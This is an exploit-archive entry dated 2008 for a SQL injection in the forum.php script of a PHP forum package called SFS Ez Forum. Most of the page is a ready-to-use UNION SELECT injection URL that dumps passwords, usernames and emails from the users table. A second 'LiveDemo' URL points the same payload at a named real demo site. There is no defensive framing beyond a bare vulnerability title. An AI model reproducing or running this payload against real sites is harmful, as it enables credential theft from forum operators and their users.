[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : SFS Ez Forum (forum.php id) SQL Injection Vulnerability
# Published : 2008-10-26
# Author : Hurley
# Previous Title : WordPress Media Holder (mediaHolder.php id) SQL Injection Vuln
# Next Title : MyForum 1.3 (lecture.php id) Remote SQL Injection Exploit


==================================================================================
      SFS Forum (forum.php id) Remote SQL Injection Vulnerability
==================================================================================
			   __  __           __          
			   / / / /_  _______/ /__  __  __
			  / /_/ / / / / ___/ / _ / / / /
			 / __  / /_/ / /  / /  __/ /_/ / 
			/_/ /_/__,_/_/  /_/___/__, /  
			                        /____/   
==================================================================================
----------------------------------------------------------------------------------
Website script: http://www.scripts-for-sites.info/index.php
----------------------------------------------------------------------------------
Exploit:      http://localHost/forum/forum.php?forum=-9999+union+all+select+null,concat_ws(0x3a,password,username,%20email),null,null+from+users/*
----------------------------------------------------------------------------------
LiveDemo:
http://www.turnkeyzone.com/demos/forum/forum.php?forum=-9999+union+all+select+null,concat_ws(0x3a,password,username,%20email),null,null+from+users/*
----------------------------------------------------------------------------------

==================================================================================
Greetz      : Boom3rang
Special Thx : Darckc0de
==================================================================================

# www.Syue.com [2008-10-26]